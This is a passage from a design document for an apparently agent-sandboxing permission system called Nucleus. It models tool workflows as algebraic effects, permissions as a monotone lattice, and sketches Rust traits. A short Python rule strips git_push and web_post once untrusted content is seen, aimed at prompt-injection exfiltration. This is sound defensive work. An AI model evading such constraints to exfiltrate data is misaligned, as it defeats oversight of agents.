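    """'Reconciler': run only policy-permitted steps (effects stubbed out)."""
    return [f"executed {op}({arg})" for op, arg in program if op in policy]

policy = {"read_file", "run_bash"}
assert validate(PROGRAM, policy) == [("git_push", "refs/heads/main")]
assert len(interpret(PROGRAM, policy)) == 2
```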
Algebraic Effects for Temporal Workflows
Temporal workflows go beyond classic monads. They’re closer to algebraic effects:
effect CreatePod : PodSpec -> PodId
effect RunTool : PodId * ToolCall -> ToolResult
effect AwaitSignal : SignalName -> SignalValue
effect Sleep : Duration -> ()
handler workflow {
return x -> Done(x)
CreatePod(spec, k) -> persist(); pod <- firecracker(spec); k(pod)
RunTool(pod, call, k) -> persist(); result <- proxy(pod, call); k(result)
AwaitSignal(name, k) -> suspend(); await signal(name); k(value)
}
Effects can be:
- Handled at different levels (activity retries vs workflow timeouts)
- Intercepted (for logging, metering, approval injection)
- Persisted (workflow state survives process crashes)
- Compensated (rollback on failure)
This is more expressive than monad transformers because effects are first-class and can be handled non-locally.
The Monotone Envelope
Security posture should be monotone: it can only tighten or terminate, never silently relax.
time →
┌─────────────────────────────────────────┐
│ Permissions │
│ ████████████████████ │ ← start
│ ██████████████████ │ ← delegation
│ ████████████████ │ ← budget consumed
│ ██████████████ │ ← time elapsed
│ ████████████ │ ← approval consumed
│ × │ ← terminated
└─────────────────────────────────────────┘
This is modeled as a monotone function on the permission lattice:
ν : L → L
where ∀p. ν(p) ≤ p (deflationary)
and ν(ν(p)) = ν(p) (idempotent)
The normalization function ν can only move down the lattice (add obligations, reduce capabilities), never up.
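Both laws are easy to check on a flattened model. The rule ("seeing untrusted content removes exfiltration-capable capabilities") and all names below are hypothetical stand-ins, not the real Nucleus ν.

```python
# ν flattened to capability sets: normalization drops capabilities that
# conflict with accumulated obligations (hypothetical rule).
FORBIDDEN_WITH_UNTRUSTED = {"git_push", "web_post"}

def nu(p: frozenset, untrusted_seen: bool) -> frozenset:
    return p - FORBIDDEN_WITH_UNTRUSTED if untrusted_seen else p

p = frozenset({"read_files", "git_push", "web_post"})
q = nu(p, untrusted_seen=True)
assert q <= p             # deflationary: ν(p) ≤ p
assert nu(q, True) == q   # idempotent: ν(ν(p)) = ν(p)
```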
Why Not Pipelines?
Unix pipelines are beautiful for data transformation:
cat file | grep pattern | sort | uniq
But they don’t model:
- Capability requirements: `grep` doesn't need different permissions than `sort`
- Effect sequencing: Order matters for effects, not just data flow
- Failure modes: Pipes abort; we need richer error handling
- Context threading: Permissions, budget, time must flow through
Pipelines transform data. Monads sequence effects with context. Nucleus is about constraining which effects are expressible—that’s fundamentally effect-theoretic.
Practical Implications
For the Rust Implementation
// Capability requirements as trait bounds (graded monad style)
pub trait ToolOp {
    type Capability: CapabilityRequirement;
    fn execute<P>(self, policy: &P) -> Result<Output, PolicyError>
    where
        P: Policy + HasCapability<Self::Capability>;
}
// Workflow steps as an enum (free monad style)
pub enum WorkflowStep<T> {
    CreatePod(PodSpec, Box<dyn FnOnce(PodId) -> WorkflowStep<T>>),
    RunTool(PodId, ToolCall, Box<dyn FnOnce(ToolResult) -> WorkflowStep<T>>),
    AwaitSignal(String, Box<dyn FnOnce(Signal) -> WorkflowStep<T>>),
    Done(T),
}
// Permission composition via meet: the result is the greatest lower bound
pub trait Meet<Rhs = Self> {
    type Output;
    fn meet(self, rhs: Rhs) -> Self::Output;
}
For Users
Think of Nucleus permissions as types, not configuration:
- The permission lattice is like a type parameter
- Operations have capability requirements like trait bounds
- Sequencing operations composes their requirements
- The uninhabitable state constraint is a type-level invariant, not a runtime check
References
- Graded Monads - Katsumata, 2014
- Algebraic Effects for Functional Programming - Leijen, 2016
- Free Monads and Free Applicatives - Capriotti & Kaposi, 2014
- Session Types - Honda et al., 1998
- The Lethal Trifecta (the "uninhabitable state") - Simon Willison, 2025
Acknowledgments
The permission lattice design was influenced by capability-based security (Dennis & Van Horn, 1966), object-capability systems (Mark Miller’s E language), and Rust’s ownership model. The three-player game draws from formal verification’s approach to separating specification from implementation.